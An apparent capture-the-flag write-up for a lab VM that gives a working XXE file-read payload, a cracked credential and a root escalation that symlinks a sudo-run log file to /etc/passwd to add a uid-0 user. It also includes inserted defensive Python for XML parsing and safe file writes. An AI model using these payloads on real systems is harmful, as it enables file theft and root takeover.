arp-scan -l

```text
Interface: eth0, type: EN10MB, MAC: 08:00:27:82:4b:5b, IPv4: 192.168.43.160
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1    12:dd:b5:07:19:10   (Unknown: locally administered)
192.168.43.73   2c:9c:58:8e:96:a5   (Unknown)
192.168.43.74   08:00:27:cf:d8:16   PCS Systemtechnik GmbH
192.168.43.135  08:00:27:dc:f8:76   PCS Systemtechnik GmbH
```
nmap

```text
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Library Membership Registration
MAC Address: 08:00:27:DC:F8:76 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
```
Visit the web page.

Hint in the page source:

```html
<!-- XML STRUCTURE EXAMPLE -->
<!--
<user>
<name>John Doe</name>
<tel>123-4567890</tel>
<email>admin@admin.com</email>
<password>secret123</password>
</user>
-->
```
Try XXE for a file read.

exp:

```xml
<!DOCTYPE ANY [
<!ENTITY fuck SYSTEM "file:///etc/passwd">
]>
<user>
<name>John Doe</name>
<tel>123-4567890</tel>
<email> &fuck;</email>
<password>secret123</password>
</user>
```

```text
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
mosquitto:x:106:113::/var/lib/mosquitto:/usr/sbin/nologin
```
expect://id cannot execute commands.

Blind guess for the usual user.txt and pass.txt.

They can be read:

/home/welcome/pass.txt

flag{user-9e681bd76c8db380aa2797b8becf6ba3}

=>

welcome:bd7787d41a6b28e9976873cf6a8445fe
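The file read above works only because the registration form's XML parser resolves the external entity declared in the DOCTYPE. As an added example that is not from the write-up or from the target application, here is how a handler for this `<user>` record should parse it: reject any DOCTYPE or ENTITY declaration before the parser sees the document, then validate the element structure. The function names and the sample record are assumptions; the standard-library ElementTree is used so the example runs with no dependencies.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample input matching the <user> structure shown in the page-source hint.
SAMPLE_USER_XML = """<user>
  <name>John Doe</name>
  <tel>123-4567890</tel>
  <email>admin@admin.com</email>
  <password>secret123</password>
</user>"""

# The form needs a plain element tree and nothing else, so any DTD is a red flag.
# Rejecting it up front means no entity (internal, external, parameter) is ever expanded.
_DTD_MARKERS = re.compile(r"<!DOCTYPE|<!ENTITY", re.IGNORECASE)

EXPECTED_FIELDS = ("name", "tel", "email", "password")


def parse_user_record(xml_text: str) -> dict:
    """Parse a <user> record without resolving DTDs or entities.

    Raises ValueError on a document carrying a DOCTYPE/ENTITY declaration,
    on malformed XML (including references to undeclared entities),
    on a wrong root element, or on a missing/empty field.
    """
    if _DTD_MARKERS.search(xml_text):
        raise ValueError("DTD / entity declarations are not accepted")
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # ElementTree raises here for undeclared entity references such as &foo;
        raise ValueError(f"malformed XML: {exc}") from None
    if root.tag != "user":
        raise ValueError(f"unexpected root element <{root.tag}>")
    record = {}
    for field in EXPECTED_FIELDS:
        node = root.find(field)
        if node is None or node.text is None or not node.text.strip():
            raise ValueError(f"missing field <{field}>")
        record[field] = node.text.strip()
    return record


def is_accepted(xml_text: str) -> bool:
    """True if the document passes validation, False if it is rejected."""
    try:
        parse_user_record(xml_text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(parse_user_record(SAMPLE_USER_XML))
```

The pre-parse rejection is deliberately blunt: a registration form has no business accepting a DTD, so refusing the whole document is simpler and safer than trying to configure entity expansion away in every parser the application might be switched to later.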
SSH in.

sudo -l

Shows that /opt/sub.sh can be run without a password:

```text
welcome@Bamuwe:/var/lib/mosquitto$ sudo -l
Matching Defaults entries for welcome on Bamuwe:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Bamuwe:
    (ALL) NOPASSWD: /opt/sub.sh
```

```text
welcome@Bamuwe:/var/lib/mosquitto$ ls -la /opt/sub.sh
-rwxr-xr-x 1 root root 52 Apr 28 10:50 /opt/sub.sh
```
Running sudo /opt/sub.sh prints the mosquitto help text.

Looked up mosquitto online.

Mosquitto is an open-source MQTT broker that implements the MQTT protocol (a lightweight IoT messaging protocol). It is developed by Eclipse and suits low-bandwidth, high-latency IoT environments.

Main usage:

```shell
mosquitto_sub -h localhost -v -t "test"               # subscribe to messages
mosquitto_pub -h localhost -t "test" -m 'hello world'  # publish a message
```
The contents of /opt/sub.sh:

```shell
/usr/bin/mosquitto_sub "$@" > /home/welcome/sub.log
```

That is, it calls the subscribe function of sub and writes whatever it receives to sub.log.

The first idea was command execution to get a shell or sensitive information, but that does not work:

```shell
sudo /opt/sub.sh -h localhost -t "test" -v
mosquitto_pub -h localhost -t "test" -m "$(cat /etc/shadow)"
cat /home/welcome/sub.log
```

The sudo privilege is on the subscriber side; the pub side cannot run under sudo.

But note the `> /home/welcome/sub.log` write: the script writes as root, and the user controls sub.log.

So it may be possible to create a symlink pointing at /etc/passwd and add a new high-privilege user.
First prepare a backup copy of /etc/passwd with a user appended at the end:

```text
welcome@Bamuwe:~$ cat bake.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
mosquitto:x:106:113::/var/lib/mosquitto:/usr/sbin/nologin
test:adMpHktIn0tR2:0:0:User_like_root:/root:/bin/bash
```

Then do the write:

```shell
rm sub.log
ln -s /etc/passwd sub.log
sudo /opt/sub.sh -h localhost -t "test" -v
mosquitto_pub -h localhost -t "test" -m "$(cat passwd.bak)"
cat /etc/passwd
```

```text
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
mosquitto:x:106:113::/var/lib/mosquitto:/usr/sbin/nologin
test:adMpHktIn0tR2:0:0:User_like_root:/root:/bin/bash
```

BlingBling, the user was written successfully.
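The write succeeds because sub.sh runs as root yet redirects into a path the invoking user owns, so whatever that user places at sub.log (here a symlink to /etc/passwd) turns into a root write. As an added example that is not from the write-up, the following Python shows the checks a privileged collector should make before writing to such a path: open with O_NOFOLLOW so a symlink fails the open, then refuse anything that is not a single-link regular file so a hard link to a protected file is caught too. The function names, the temp-directory scenario and the stand-in for /etc/passwd are constructed for this demo. The complete fix is also to keep the log under a root-owned directory and to stop passing `"$@"` straight through to a NOPASSWD command.

```python
import os
import stat
import tempfile


def append_line_safely(path: str, line: str) -> bool:
    """Append one line to `path`, refusing symlinks and multiply-linked files.

    This is what a root-run collector such as sub.sh should do before writing
    into a path the invoking user controls. Returns True on success, False if
    the target was rejected (nothing is written in that case).
    """
    flags = os.O_WRONLY | os.O_CREAT | os.O_APPEND | os.O_NOFOLLOW
    try:
        # O_NOFOLLOW makes open() fail with ELOOP if the last path component is a symlink.
        fd = os.open(path, flags, 0o600)
    except OSError:
        return False
    try:
        st = os.fstat(fd)
        # A hard link to /etc/passwd survives O_NOFOLLOW; the link count exposes it.
        if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
            return False
        os.write(fd, (line + "\n").encode())
        return True
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed scenario in a temp dir: a genuine log file, then the same
    name replaced by a symlink (as the write-up's `ln -s` does) and a hard link,
    both pointing at a file standing in for /etc/passwd."""
    with tempfile.TemporaryDirectory() as d:
        protected = os.path.join(d, "passwd-standin")
        original = "root:x:0:0:root:/root:/bin/bash\n"
        with open(protected, "w") as f:
            f.write(original)

        real_log = os.path.join(d, "sub.log")
        regular_ok = append_line_safely(real_log, "test hello")

        os.remove(real_log)
        os.symlink(protected, real_log)
        symlink_blocked = not append_line_safely(real_log, "injected line")

        hard = os.path.join(d, "hardlink.log")
        os.link(protected, hard)
        hardlink_blocked = not append_line_safely(hard, "injected line")

        with open(protected) as f:
            untouched = f.read() == original

        return {
            "regular_ok": regular_ok,
            "symlink_blocked": symlink_blocked,
            "hardlink_blocked": hardlink_blocked,
            "protected_untouched": untouched,
        }


if __name__ == "__main__":
    print(demo())
```

The `fs.protected_symlinks` sysctl only stops root from following symlinks in world-writable sticky directories such as /tmp; it does nothing for a symlink inside the user's own home, which is exactly where sub.sh writes, so the check has to live in the program itself.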
```shell
su test
Password: test
```

Privilege escalation succeeded:

```text
welcome@Bamuwe:~$ su test
Password: test
root@Bamuwe:/home/welcome# cd /root
root@Bamuwe:~# ls
root.txt
root@Bamuwe:~# cat root.txt
flag{root-78a594db4a7c7d05f6366740501ad4c6}
```
Afterword: security work probably takes more than accumulating raw knowledge; what matters more is the ability to learn quickly and to think analytically. There will be many more unfamiliar and abstract things ahead, and only an open mind can keep up with an environment that changes this fast.

This can be treated as a hobby.